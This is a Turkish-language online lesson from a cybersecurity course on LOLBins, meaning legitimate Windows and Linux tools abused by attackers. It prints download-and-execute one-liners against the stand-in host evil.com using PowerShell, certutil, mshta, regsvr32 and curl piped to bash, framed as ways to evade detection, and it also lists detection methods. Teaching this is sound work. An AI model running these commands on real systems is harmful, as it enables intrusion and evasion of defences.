0Pricing
Cyber Security Academy · Ders

Living-Off-the-Land İkili Dosyaları (LOLBins)

Tespitten kaçınmak için güvenilir Windows ikili dosyalarını (certutil, mshta, regsvr32) kullanın.

Living-Off-the-Land İkili Dosyaları (LOLBins), CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 2. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

LOLBins Nedir?

Living-Off-the-Land Binaries (LOLBins), saldırganların kötü amaçlı eylemler gerçekleştirmek üzere yeniden kullandığı meşru OS ikili dosyaları ve araçlarıdır. Bunlar güvenilir, imzalı sistem araçları olduğundan uygulama izin listelerini çoğu zaman aşar ve AV/EDR tespitini azaltır.

LOLBins Neden Etkilidir

Saldırganlar açısından avantajları:

  • Hedef sistemlerde her zaman bulunurlar; yeni dosyalar yerleştirmeye gerek kalmaz
  • Microsoft/Apple tarafından imzalanırlar; imza tabanlı tespiti aşarlar
  • Uygulama izin listesi çözümleri tarafından güvenilir kabul edilirler
  • Meşru görünen işlem ağaçları oluştururlar

PowerShell Bir LOLBin Olarak

PowerShell, en çok kötüye kullanılan LOLBin'dir. Saldırganlar şunları kullanır:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe, dosyaları indirebilen bir Windows sertifika aracıdır:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta ve wscript

Güvenilir ana bilgisayarlar üzerinden betik çalıştırma:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

regsvr32.exe, /s /n /u /i bayrakları aracılığıyla uzak URL'lerdeki DLL'leri yükleyip çalıştırabilir; böylece AppLocker'ı aşar ve imzasız kodu güvenilir bir işlem olarak çalıştırır:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

WMIC ve WMI ile Çalıştırma

Windows Management Instrumentation, kodun hem uzaktan hem de yerel olarak çalıştırılmasını sağlar:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

rundll32.exe, DLL giriş noktalarını yükler ve çalıştırır:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

Linux LOLBin'leri

Linux karşılıkları:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS ve GTFOBins

Başvuru veritabanları:

  • LOLBAS (lolbas-project.github.io) — Windows ikili dosyaları, betikleri ve kitaplıkları
  • GTFOBins (gtfobins.github.io) — istismar, dosya okuma/yazma ve SUID yükseltmesi için Linux/macOS ikili dosyaları

LOLBIn Kötüye Kullanımını Tespit Etme

Tespit stratejileri:

  • PowerShell betik bloğu günlük kaydı (EventID 4104) — kodu çözülmüş komutları günlüğe kaydeder
  • Sysmon EventID 1: üst işlem zinciriyle birlikte işlem oluşturma
  • Beklenmeyen üst-alt işlemler için uyarı verin: Word → PowerShell, Excel → cmd
  • certutil, mshta ve powershell kaynaklı ağ bağlantıları
  • Anormal ikili dosya kullanımını işaretlemek için UEBA temel çizgileri

Hızlı Kontrol: LOLBins

Hangi Windows ikili dosyası, -urlcache bayrağını kullanarak uzak bir dosyayı indirebilir?

Ders Özeti

LOLBins, kötü amaçlı kullanım için yeniden amaçlandırılan meşru OS araçlarıdır: Windows'ta PowerShell, certutil, mshta, regsvr32, rundll32 ve WMIC; Linux'ta curl, python ve openssl. İmza tabanlı tespiti ve uygulama izin listelerini aşarlar. Tespit için işlem oluşturma günlük kaydı (Sysmon), PowerShell betik bloğu günlük kaydı ve davranışsal temel çizgiler gerekir. LOLBAS ve GTFOBins temel başvuru veritabanlarıdır.

Sıkça Sorulan Sorular

“Living-Off-the-Land İkili Dosyaları (LOLBins)” dersi ücretsiz mi?

Evet — “Living-Off-the-Land İkili Dosyaları (LOLBins)” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“Living-Off-the-Land İkili Dosyaları (LOLBins)” dersinde ne öğreneceğim?

Tespitten kaçınmak için güvenilir Windows ikili dosyalarını (certutil, mshta, regsvr32) kullanın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 2. dersidir.

“Living-Off-the-Land İkili Dosyaları (LOLBins)” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. C2 Çerçeveleri: Cobalt Strike ve Sliver
  2. Living-Off-the-Land İkili Dosyaları (LOLBins)
  3. Yanal Hareket Teknikleri
  4. Kırmızı Ekip Raporu Yazma
← Cyber Security Academy Sayfasına Dön